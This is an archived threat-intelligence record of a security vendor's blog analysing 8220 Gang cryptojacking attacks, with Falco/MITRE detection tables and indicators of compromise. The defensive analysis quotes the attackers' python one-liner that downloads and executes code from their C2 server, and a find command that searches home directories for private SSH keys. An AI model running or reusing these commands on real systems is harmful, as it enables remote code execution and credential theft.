{
	"id": "95ad92a7-d1fc-4ce0-b4e6-90f49852b569",
	"created_at": "2026-04-06T00:15:03.942379Z",
	"updated_at": "2026-04-10T13:11:54.810647Z",
	"deleted_at": null,
	"sha1_hash": "3053d8fc62fda388518356d4e8f1be78ee7fcc58",
	"title": "8220 Gang Continues to Evolve With Each New Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 314194,
	"plain_text": "8220 Gang Continues to Evolve With Each New Campaign\r\nBy Crystal Morin\r\nPublished: 2023-02-14 · Archived: 2026-04-02 12:28:33 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 1 of 6\n\n8220 Gang has been dubbed as a group of low-level script kiddies with an equally disappointing name based on\r\ntheir original use of port 8220 for Command and Control (C2) network communications dating back to 2017.\r\nSince an initial Talos report in late 2018, the group has continued to use, learn, and benefit from the efforts of their\r\ncounterparts in the cryptojacking world. The group is fairly well known for regularly changing its tactics,\r\ntechniques, and procedures (TTPs), either to avoid detection or because they are learning and continuing to\r\nimprove with each campaign.\r\nIn this blog, we dig into a few recent 8220 Gang attacks captured by Sysdig's Threat Research Team. We will let\r\nyou know which of their counterparts they are currently stealing tools from and highlight their new and improved\r\ntechniques. As always, a list of indicators of compromise (IoCs) can be found at the end of the blog.\r\nThis gang is hardly original\r\n8220 Gang is well known for using the tactics and techniques of other groups, and there are a few reasons as to\r\nwhy: either it is easier to steal, and this Gang is not sophisticated enough to create their own tools, or they are\r\ntrying to obfuscate attribution. Occam's Razor dictates that it is the former. 8220 Gang has been previously\r\nreported as having borrowed TeamTNT and Rocke Group scripts and miners, and WatchDog domain naming\r\nstyles.\r\nSummary of past campaigns\r\nCisco Talos first reported on 8220 Gang in December 2018, with a timeline and description of the group's initial\r\nefforts, which included: exploiting Struts2, Redis, and Weblogic; using whatMiner; and using malicious Docker\r\nimages. Cloud security practitioners might remember that the threat actor known as TeamTNT also emerged\r\naround this time, exploiting many of the same vulnerabilities and misconfigurations, specifically the exposed\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 2 of 6\n\nDocker endpoint and vulnerable instances of Redis. In mid-2021, Lacework identified 8220 Gang's XMRig\r\nvariant called PwnRig, in addition to a modified Tsunami-based IRC botnets and new loader script. 8220 Gang's\r\nuse of PwnRig was notable because it was the first recorded instance of the group making changes to compiled\r\ncode, as opposed to scripts. 8220 Gang's changes to XMRig in creating PwnRig obfuscate the configuration file\r\nand mining pool, both typically used as IoCs.\r\nMore recently, SentinelOne reported on 8220 Gang in July and October 2022, expanding their botnet and\r\ncryptomining distribution. In these campaigns, the group continued to exploit misconfigured and vulnerable\r\npublic-facing hosts. New TTPs in these reports included the use of the PureCrypter Malware-as-a-Service\r\ndownloader, shifting C2 infrastructure between 89.34.27[.]167 and 79.110.62[.]23 , using Discord to\r\nstash malware, and downloading commands from a remote server via a shell script with the name jira?confluence.\r\nWhat are we seeing now?\r\nOur most recently observed 8220 Gang attacks between November 2022 and January 2023 have many similarities\r\nwith those previously observed and detailed, namely, that the end-goal is cryptojacking. The group continues to\r\nscan the internet for vulnerable applications, using masscan and spirit for discovery efforts. Unsurprisingly, two of\r\nour three captures were against exploitable Oracle Weblogic applications. Similarly, the other campaign attacked a\r\nvulnerable Apache web server. The group also still deploys the PwnRig fork of XMRig and uses cron to schedule\r\npersistence.\r\nWhat has changed? The first-stage loader in our January capture is a shell script named xms downloaded from\r\nthat campaign's main C2 185[.]106[.]94[.]146 . The main differences between the November and January\r\ncampaigns are that the newer attacks are more robust. One example is the addition of lwp-download as a backup\r\ndownload tool to wget and cron. Another is the creation of init.d services for persistence. The newest attack also\r\nchecks for an active C2 connection before attempting to (re-)install itself.\r\nEarly on in their efforts, 8220 Gang reused C2 infrastructure. We can now say with confidence that the group has\r\nsince upgraded to consistently changing their C2 IP addresses. 8220 Gang also used the oanacroner script for the\r\nfirst time, which is something that has been previously reported for the Rocke cryptoming group. Between the\r\nNovember and January attacks, both domains and IP addresses were rotated.\r\nAdditionally, in January, 8220 Gang used the command find /root/ /root /home -maxdepth 2 -name id_rsa* as a\r\nnew discovery tactic to locate private keys. The group also added more defense evasion tactics, including the use\r\nof bash -sh to erase their steps and also introduced a base64-encoded the following python script to gather their\r\ntoolset:\r\npython -c “import urllib; exec(urllib.urlopen(\"http[://]185.106.94.146/e.py\").read())”\r\nATT\u0026CK Matrix and Falco Coverage\r\nThe tables below show the MITRE ATT\u0026CK-aligned Falco rules that were triggered during the three 8220 Gang\r\nattacks we received. Spoiler alert: there was a lot of consistency across the three campaigns! The first table has\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 3 of 6\n\nFalco rules that were triggered in more than one campaign. The second table indicates deviations across the\r\ncampaigns with rules that were only triggered once.\r\n8220 Gang techniques consistently used:\r\nFalco rule triggered MITRE ATT\u0026CK Tactic\r\nExecution from /tmp Execution, Privilege escalation, Defense evasion\r\nSuspicious system service modification Persistence, Privilege escalation, Defense evasion\r\nModify ld.so.preload Persistence, Privilege escalation, Defense evasion\r\nSuspicious cron modification Persistence, Privilege escalation, Defense evasion\r\nWrite below root Persistence, Defense evasion\r\nLaunch ingress remote file copy tools in container Lateral movement\r\nSchedule cron jobs Execution, Persistence, Privilege escalation\r\nWrite below binary dir Persistence, Defense evasion\r\nRead shell configuration file Discovery\r\nWrite below etc Persistence, Defense evasion\r\nNew techniques observed in January:\r\nFalco rule triggered MITRE ATT\u0026CK Tactic\r\nDetect malicious cmdlines (use of lwp_download) Execution, Persistence, Privilege escalation\r\nSearch private keys or passwords Discovery\r\nClear log activities Defense evasion\r\nBase64-encoded python script execution Defense evasion\r\nConclusion\r\nShockingly, 8220 Gang remains a household name in the cloud threat detection and response world. Although,\r\nfrom all signs and measures, they can still be described as \"script kiddies,\" the natural progression of their\r\ncampaigns means that someday soon, that label may be a misnomer. Following best practices for securing your\r\ncloud will ensure that you are protected from unsophisticated yet developing actors, such as 8220 Gang.\r\nIndicators of compromise\r\nC2 IP Addresses\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 4 of 6\n\n185.106.94[.]146\r\n85.209.134[.]86\r\n51.255.171[.]23\r\n194.38.23[.]170\r\nFilename MD5\r\nlinux-d 5cc46e42feea62c6fbe2d600dd5aab51\r\noanacroner 0621ed468aa68a2b46391e3455a049ec\r\nircd 63a86932a5bad5da32ebd1689aa814b3\r\ninitdr 915aec68a5b53aa7681a461a122594d9\r\nsysdown 90df9de121f55f1d01b370f362d13aca\r\napache 1bb8edf3ed8693df62bcbfe2fe05dadd\r\nxms 13fe53f6a2632f05c16da40de9bfc829\r\n.bashrc 92c3c4f1c5fb684a1f92cd1ddeb1d9fb\r\n.ntpdate 26803695b83b5e39290d654fcd28774a\r\npwnrig 6b2b76ffa0926f049dfa28cf03bd8e40\r\nxms 13fe53f6a2632f05c16da40de9bfc829\r\nbashirc.x86_64 63a86932a5bad5da32ebd1689aa814b3\r\nspirit 09c305e3e06bf1a54d28f16a2b38c979\r\ninitdr 0ffa42915a8182dca447772138ef4510\r\nbashirc 63a86932a5bad5da32ebd1689aa814b3\r\n.tmpest a4c97040c898e2ad416d1ddef826491d\r\nmasscan eefc0ce93d254982fbbcd26460f3d10d\r\njira?confluence a4c97040c898e2ad416d1ddef826491d\r\nFor additional IoCs associated with this campaign, please visit our GitHub page.\r\nAbout the author\r\nTest drive the right way to defend the cloudwith a security expert\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 5 of 6\n\nSource: https://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nhttps://sysdig.com/blog/8220-gang-continues-to-evolve/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysdig.com/blog/8220-gang-continues-to-evolve/"
	],
	"report_names": [
		"8220-gang-continues-to-evolve"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8",
			"created_at": "2024-07-09T02:00:04.434476Z",
			"updated_at": "2026-04-10T02:00:03.671196Z",
			"deleted_at": null,
			"main_name": "Water Sigbin",
			"aliases": [
				"8220 Gang"
			],
			"source_name": "MISPGALAXY:Water Sigbin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434503,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.pdf",
		"text": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.txt",
		"img": "https://archive.orkl.eu/3053d8fc62fda388518356d4e8f1be78ee7fcc58.jpg"
	}
}